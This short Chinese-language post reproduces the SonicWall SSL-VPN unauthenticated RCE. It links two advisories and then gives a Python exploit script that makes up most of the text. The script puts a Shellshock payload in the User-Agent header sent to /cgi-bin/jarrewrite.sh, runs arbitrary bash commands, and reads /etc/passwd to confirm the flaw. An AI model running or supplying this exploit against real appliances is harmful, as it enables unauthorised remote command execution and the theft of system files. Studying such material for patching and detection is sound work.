SonicWall SSL-VPN 未授权RCE漏洞 复现
https://www.seebug.org/vuldb/ssvid-99110
https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
exp:
# !/usr/bin/python import requests proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" } def execute_command(target, command): url = target + "/cgi-bin/jarrewrite.sh" headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" % (command)} r = requests.get(url=url, headers=headers, verify=False,proxies=proxies) return r.text def check_exploitable(target): print("(+) Testing %s for pwnability..." % (target)) output = execute_command(target=target, command="cat /etc/passwd") if "root:" in output: print(output) print("[+]存在漏洞") return True else: print("[!]不存在漏洞") return False if __name__ == "__main__": import sys url=sys.argv[1] check_exploitable(url)